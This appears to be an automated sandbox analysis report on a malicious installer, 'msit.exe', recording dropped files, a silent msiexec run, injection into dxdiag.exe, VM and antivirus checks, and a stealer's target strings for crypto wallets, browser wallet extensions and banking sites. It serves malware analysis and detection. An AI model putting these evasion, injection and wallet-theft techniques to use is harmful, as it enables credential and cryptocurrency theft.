              Source: Binary string: D:\a\1\s\Win32\Release\Microsoft.Toolkit.Win32.UI.XamlApplication\Microsoft.Toolkit.Win32.UI.XamlHost.pdb source: msit.msi.0.dr
              Source: Binary string: D:\a\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msit.msi.0.dr
              Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\SoftwareDetector.pdbm source: MSIA28C.tmp.2.dr, msit.msi.0.dr
              Source: Binary string: E:\BA\201\s\140_release\vcrt_fwd_x86_release\Release\vcamp140_app.pdb source: msit.msi.0.dr
              Source: Binary string: D:\a\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: msit.msi.0.dr
              Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\SoftwareDetector.pdb source: MSIA28C.tmp.2.dr, msit.msi.0.dr
              Source: Binary string: wininet.pdbUGP source: shi95F5.tmp.0.dr
              Source: Binary string: E:\BA\201\s\140_release\vcrt_fwd_x86_release\Release\vccorlib140_app.pdb source: msit.msi.0.dr
              Source: Binary string: D:\a\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdbGCTL source: msit.msi.0.dr
              Source: Binary string: ucrtbase.pdbUGP source: msit.msi.0.dr
              Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\lzmaextractor.pdb source: msit.msi.0.dr
              Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\AICustAct.pdb source: MSIA20D.tmp.2.dr, MSI9720.tmp.0.dr, msit.msi.0.dr
              Source: Binary string: C:\ReleaseAI\win\Release\stubs\x86\ExternalUi.pdb source: msit.exe
              Source: Binary string: D:\a\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdbGCTL source: msit.msi.0.dr
              Source: Binary string: D:\a\_work\1\s\140_release\vcrt_fwd_x86_release\Release\msvcp140_app.pdb source: msit.msi.0.dr
              Source: msit.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
              Source: msit.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
              Source: msit.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
              Source: msit.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
              Source: msit.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
              Source: shi95F5.tmp.0.drStatic PE information: 0xC7FEC470 [Wed Apr 29 05:06:56 2076 UTC]
              Source: msit.exeStatic PE information: section name: .didat
              Source: msit.exeStatic PE information: section name: .fptable
              Source: MSI98AD.tmp.0.drStatic PE information: section name: .didat
              Source: MSI98AD.tmp.0.drStatic PE information: section name: .fptable
              Source: MSI98DD.tmp.0.drStatic PE information: section name: .didat
              Source: MSI98DD.tmp.0.drStatic PE information: section name: .fptable
              Source: shi95F5.tmp.0.drStatic PE information: section name: .wpp_sf
              Source: shi95F5.tmp.0.drStatic PE information: section name: .didat
              Source: MSI96A2.tmp.0.drStatic PE information: section name: .fptable
              Source: MSI9720.tmp.0.drStatic PE information: section name: .fptable
              Source: MSI9760.tmp.0.drStatic PE information: section name: .fptable
              Source: MSI9790.tmp.0.drStatic PE information: section name: .fptable
              Source: MSI97FE.tmp.0.drStatic PE information: section name: .didat
              Source: MSI97FE.tmp.0.drStatic PE information: section name: .fptable
              Source: MSI982E.tmp.0.drStatic PE information: section name: .didat
              Source: MSI982E.tmp.0.drStatic PE information: section name: .fptable
              Source: MSI986D.tmp.0.drStatic PE information: section name: .didat
              Source: MSI986D.tmp.0.drStatic PE information: section name: .fptable
              Source: MSIA6C8.tmp.0.drStatic PE information: section name: .didat
              Source: MSIA6C8.tmp.0.drStatic PE information: section name: .fptable
              Source: MSIA708.tmp.0.drStatic PE information: section name: .didat
              Source: MSIA708.tmp.0.drStatic PE information: section name: .fptable
              Source: MSIA16F.tmp.2.drStatic PE information: section name: .fptable
              Source: MSIA1CE.tmp.2.drStatic PE information: section name: .fptable
              Source: MSIA20D.tmp.2.drStatic PE information: section name: .fptable
              Source: MSIA23D.tmp.2.drStatic PE information: section name: .fptable
              Source: MSIA28C.tmp.2.drStatic PE information: section name: .fptable
              Source: MSIA2BC.tmp.2.drStatic PE information: section name: .fptable
              Source: MSIA2EC.tmp.2.drStatic PE information: section name: .didat
              Source: MSIA2EC.tmp.2.drStatic PE information: section name: .fptable
              Source: MSIA455.tmp.2.drStatic PE information: section name: .fptable
              Source: MSIA455.tmp.2.drStatic PE information: section name: _RDATA
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 7_2_00442904 push es; ret 7_2_00442905
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 7_2_00438A00 push eax; mov dword ptr [esp], BEBFA0A1h7_2_00438A0E
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 7_2_004423EC push es; ret 7_2_004423ED
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 7_2_0043B690 push eax; mov dword ptr [esp], E3E2E1D0h7_2_0043B692

              Persistence and Installation Behavior

              barindex
              Source: C:\Windows\System32\msiexec.exeExecutable created and started: C:\Windows\Installer\MSIA455.tmpJump to behavior
              Source: C:\Users\user\Desktop\msit.exeFile created: C:\Users\user\AppData\Local\Temp\MSIA708.tmpJump to dropped file
              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIA20D.tmpJump to dropped file
              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIA28C.tmpJump to dropped file
              Source: C:\Users\user\Desktop\msit.exeFile created: C:\Users\user\AppData\Local\Temp\MSI97FE.tmpJump to dropped file
              Source: C:\Users\user\Desktop\msit.exeFile created: C:\Users\user\AppData\Local\Temp\MSI98AD.tmpJump to dropped file
              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIA23D.tmpJump to dropped file
              Source: C:\Users\user\Desktop\msit.exeFile created: C:\Users\user\AppData\Local\Temp\MSI98DD.tmpJump to dropped file
              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIA16F.tmpJump to dropped file
              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIA2BC.tmpJump to dropped file
              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIA2EC.tmpJump to dropped file
              Source: C:\Users\user\Desktop\msit.exeFile created: C:\Users\user\AppData\Local\Temp\MSI96A2.tmpJump to dropped file
              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIA455.tmpJump to dropped file
              Source: C:\Users\user\Desktop\msit.exeFile created: C:\Users\user\AppData\Local\Temp\MSI9720.tmpJump to dropped file
              Source: C:\Users\user\Desktop\msit.exeFile created: C:\Users\user\AppData\Local\Temp\MSI9760.tmpJump to dropped file
              Source: C:\Users\user\Desktop\msit.exeFile created: C:\Users\user\AppData\Local\Temp\MSI9790.tmpJump to dropped file
              Source: C:\Users\user\Desktop\msit.exeFile created: C:\Users\user\AppData\Local\Temp\shi95F5.tmpJump to dropped file
              Source: C:\Users\user\Desktop\msit.exeFile created: C:\Users\user\AppData\Local\Temp\MSI982E.tmpJump to dropped file
              Source: C:\Users\user\Desktop\msit.exeFile created: C:\Users\user\AppData\Local\Temp\MSIA6C8.tmpJump to dropped file
              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIA1CE.tmpJump to dropped file
              Source: C:\Users\user\Desktop\msit.exeFile created: C:\Users\user\AppData\Local\Temp\MSI986D.tmpJump to dropped file
              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIA20D.tmpJump to dropped file
              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIA28C.tmpJump to dropped file
              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIA23D.tmpJump to dropped file
              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIA16F.tmpJump to dropped file
              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIA2BC.tmpJump to dropped file
              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIA2EC.tmpJump to dropped file
              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIA455.tmpJump to dropped file
              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIA1CE.tmpJump to dropped file
              Source: C:\Users\user\Desktop\msit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Source: C:\Windows\SysWOW64\dxdiag.exeSystem information queried: FirmwareTableInformationJump to behavior
              Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSIA20D.tmpJump to dropped file
              Source: C:\Users\user\Desktop\msit.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSIA708.tmpJump to dropped file
              Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSIA28C.tmpJump to dropped file
              Source: C:\Users\user\Desktop\msit.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI97FE.tmpJump to dropped file
              Source: C:\Users\user\Desktop\msit.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI98AD.tmpJump to dropped file
              Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSIA23D.tmpJump to dropped file
              Source: C:\Users\user\Desktop\msit.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI98DD.tmpJump to dropped file
              Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSIA2BC.tmpJump to dropped file
              Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSIA16F.tmpJump to dropped file
              Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSIA2EC.tmpJump to dropped file
              Source: C:\Users\user\Desktop\msit.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI96A2.tmpJump to dropped file
              Source: C:\Users\user\Desktop\msit.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI9720.tmpJump to dropped file
              Source: C:\Users\user\Desktop\msit.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI9760.tmpJump to dropped file
              Source: C:\Users\user\Desktop\msit.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI9790.tmpJump to dropped file
              Source: C:\Users\user\Desktop\msit.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\shi95F5.tmpJump to dropped file
              Source: C:\Users\user\Desktop\msit.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSIA6C8.tmpJump to dropped file
              Source: C:\Users\user\Desktop\msit.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI982E.tmpJump to dropped file
              Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSIA1CE.tmpJump to dropped file
              Source: C:\Users\user\Desktop\msit.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI986D.tmpJump to dropped file
              Source: C:\Windows\SysWOW64\dxdiag.exe TID: 3284Thread sleep time: -180000s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exe TID: 6072Thread sleep time: -30000s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
              Source: C:\Users\user\Desktop\msit.exeFile Volume queried: C:\Users\user\AppData\Roaming FullSizeInformationJump to behavior
              Source: C:\Users\user\Desktop\msit.exeFile Volume queried: C:\Users\user\AppData\Roaming\msit\msit 1.0.1\install\C07CAF6 FullSizeInformationJump to behavior
              Source: C:\Users\user\Desktop\msit.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\Desktop\msit.exeFile Volume queried: C:\Users\user\AppData\Roaming\msit\msit 1.0.1\install\C07CAF6 FullSizeInformationJump to behavior
              Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\Desktop\msit.exeFile opened: C:\Users\user\AppData\Jump to behavior
              Source: C:\Users\user\Desktop\msit.exeFile opened: C:\Users\user\AppData\Roaming\Jump to behavior
              Source: C:\Users\user\Desktop\msit.exeFile opened: C:\Users\user\Jump to behavior
              Source: C:\Users\user\Desktop\msit.exeFile opened: C:\Users\user\AppData\Roaming\msit\msit 1.0.1\install\C07CAF6\Jump to behavior
              Source: C:\Users\user\Desktop\msit.exeFile opened: C:\Users\user\AppData\Roaming\msit\msit 1.0.1\Jump to behavior
              Source: C:\Users\user\Desktop\msit.exeFile opened: C:\Users\user\AppData\Roaming\msit\msit 1.0.1\install\Jump to behavior
              Source: dxdiag.exe, 00000007.00000003.1625067997.0000000005253000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: - GDCDYNVMware20,11696494690p
              Source: dxdiag.exe, 00000007.00000003.1625067997.000000000524E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696494690
              Source: dxdiag.exe, 00000007.00000003.1625067997.000000000524E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696494690f
              Source: dxdiag.exe, 00000007.00000003.1625067997.000000000524E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696494690
              Source: dxdiag.exe, 00000007.00000003.1625067997.000000000524E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696494690s
              Source: dxdiag.exe, 00000007.00000003.1625067997.000000000524E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
              Source: dxdiag.exe, 00000007.00000003.1625067997.000000000524E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
              Source: dxdiag.exe, 00000007.00000003.1625067997.000000000524E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
              Source: dxdiag.exe, 00000007.00000003.1625067997.000000000524E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696494690
              Source: dxdiag.exe, 00000007.00000003.1625067997.000000000524E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696494690
              Source: dxdiag.exe, 00000007.00000003.1625067997.000000000524E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696494690d
              Source: dxdiag.exe, 00000007.00000003.1625067997.000000000524E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696494690u
              Source: msit.msi.0.drBinary or memory string: HKEY_USERSRegOpenKeyTransactedW::NetUserGetInfo() failed with error: \@invalid string_view positionVMware, Inc.VMware Virtual PlatformVMware7,1VMware20,1innotek GmbHVirtualBoxMicrosoft CorporationVirtual MachineVRTUALACRSYSA M IGetting system informationManufacturer [Model [BIOS [\\?\UNC\\\?\shim_clone%d.%d.%d.%dDllGetVersion[%!]%!ProgramFilesFolderCommonFilesFolderDesktopFolderAllUsersDesktopFolderAppDataFolderFavoritesFolderStartMenuFolderProgramMenuFolderStartupFolderFontsFolderLocalAppDataFolderCommonAppDataFolderProgramFiles64FolderProgramFilesProgramW6432SystemFolderSystem32FolderWindowsFolderWindowsVolumeTempFolderSETUPEXEDIRshfolder.dllSHGetFolderPathWProgramFilesAPPDATAPROGRAMFILES&+
              Source: dxdiag.exe, 00000007.00000003.1625067997.000000000524E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696494690t
              Source: dxdiag.exe, 00000007.00000002.1708428233.0000000002EFF000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000007.00000002.1708428233.0000000002ECC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: dxdiag.exe, 00000007.00000003.1625067997.000000000524E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696494690}
              Source: dxdiag.exe, 00000007.00000003.1625067997.000000000524E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696494690x
              Source: dxdiag.exe, 00000007.00000003.1625067997.000000000524E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
              Source: dxdiag.exe, 00000007.00000003.1625067997.000000000524E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696494690
              Source: dxdiag.exe, 00000007.00000003.1625067997.000000000524E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
              Source: dxdiag.exe, 00000007.00000003.1625067997.000000000524E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696494690h
              Source: dxdiag.exe, 00000007.00000003.1625067997.000000000524E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696494690o
              Source: dxdiag.exe, 00000007.00000002.1708428233.0000000002EFF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWW
              Source: dxdiag.exe, 00000007.00000003.1625067997.000000000524E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
              Source: dxdiag.exe, 00000007.00000003.1625067997.000000000524E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
              Source: dxdiag.exe, 00000007.00000003.1625067997.000000000524E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696494690j
              Source: dxdiag.exe, 00000007.00000003.1625067997.000000000524E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696494690
              Source: dxdiag.exe, 00000007.00000003.1625067997.000000000524E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696494690t
              Source: dxdiag.exe, 00000007.00000003.1625067997.000000000524E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696494690x
              Source: dxdiag.exe, 00000007.00000003.1625067997.000000000524E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696494690}
              Source: dxdiag.exe, 00000007.00000003.1625067997.000000000524E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690
              Source: dxdiag.exe, 00000007.00000003.1625067997.000000000524E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696494690]
              Source: dxdiag.exe, 00000007.00000003.1625067997.000000000524E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696494690x
              Source: dxdiag.exe, 00000007.00000003.1625067997.000000000524E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
              Source: dxdiag.exe, 00000007.00000003.1625067997.000000000524E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696494690|UE
              Source: C:\Windows\System32\msiexec.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 7_2_00439E40 LdrInitializeThunk,7_2_00439E40
              Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\Installer\MSIA455.tmp "C:\Windows\Installer\MSIA455.tmp"Jump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Source: C:\Windows\Installer\MSIA455.tmpMemory allocated: C:\Windows\SysWOW64\dxdiag.exe base: 400000 protect: page execute and read and writeJump to behavior
              Source: C:\Windows\Installer\MSIA455.tmpMemory written: C:\Windows\SysWOW64\dxdiag.exe base: 400000 value starts with: 4D5AJump to behavior
              Source: C:\Windows\Installer\MSIA455.tmpMemory written: C:\Windows\SysWOW64\dxdiag.exe base: 400000Jump to behavior
              Source: C:\Windows\Installer\MSIA455.tmpMemory written: C:\Windows\SysWOW64\dxdiag.exe base: 401000Jump to behavior
              Source: C:\Windows\Installer\MSIA455.tmpMemory written: C:\Windows\SysWOW64\dxdiag.exe base: 43E000Jump to behavior
              Source: C:\Windows\Installer\MSIA455.tmpMemory written: C:\Windows\SysWOW64\dxdiag.exe base: 441000Jump to behavior
              Source: C:\Windows\Installer\MSIA455.tmpMemory written: C:\Windows\SysWOW64\dxdiag.exe base: 451000Jump to behavior
              Source: C:\Windows\Installer\MSIA455.tmpMemory written: C:\Windows\SysWOW64\dxdiag.exe base: 452000Jump to behavior
              Source: C:\Windows\Installer\MSIA455.tmpMemory written: C:\Windows\SysWOW64\dxdiag.exe base: 2BC0008Jump to behavior
              Source: C:\Windows\Installer\MSIA455.tmpProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"Jump to behavior
              Source: C:\Users\user\Desktop\msit.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "c:\windows\system32\msiexec.exe" /i "c:\users\user\appdata\roaming\msit\msit 1.0.1\install\c07caf6\msit.msi" /qn /norestart ai_setupexepath=c:\users\user\desktop\msit.exe setupexedir=c:\users\user\desktop\ exe_cmd_line="/exenoupdates /forcecleanup /wintime 1736753519 "
              Source: C:\Users\user\Desktop\msit.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "c:\windows\system32\msiexec.exe" /i "c:\users\user\appdata\roaming\msit\msit 1.0.1\install\c07caf6\msit.msi" /qn /norestart ai_setupexepath=c:\users\user\desktop\msit.exe setupexedir=c:\users\user\desktop\ exe_cmd_line="/exenoupdates /forcecleanup /wintime 1736753519 " Jump to behavior
              Source: C:\Users\user\Desktop\msit.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\Installer\MSIA455.tmpCode function: 6_2_00007FF68E585D6C GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,6_2_00007FF68E585D6C
              Source: C:\Windows\SysWOW64\dxdiag.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
              Source: dxdiag.exe, 00000007.00000003.1697639523.0000000002F4A000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000007.00000003.1681864403.0000000002F3F000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000007.00000002.1708678569.0000000002F4F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ndows Defender\MsMpeng.exe
              Source: dxdiag.exe, 00000007.00000003.1676727815.0000000002F69000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000007.00000003.1676142921.0000000002F69000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000007.00000002.1708428233.0000000002EDE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
              Source: C:\Windows\SysWOW64\dxdiag.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

              Stealing of Sensitive Information

              barindex
              Source: Yara matchFile source: Process Memory Space: dxdiag.exe PID: 1984, type: MEMORYSTR
              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
              Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
              Source: dxdiag.exe, 00000007.00000003.1662361641.0000000002F65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Electrum-LTC
              Source: dxdiag.exe, 00000007.00000003.1662361641.0000000002F65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/ElectronCash
              Source: dxdiag.exe, 00000007.00000003.1662361641.0000000002F65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: window-state.json
              Source: dxdiag.exe, 00000007.00000003.1662411147.0000000002F5B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Jaxx Liberty
              Source: dxdiag.exe, 00000007.00000003.1662361641.0000000002F65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ExodusWeb3
              Source: dxdiag.exe, 00000007.00000003.1662385365.0000000002F60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
              Source: dxdiag.exe, 00000007.00000003.1662466227.0000000002F63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
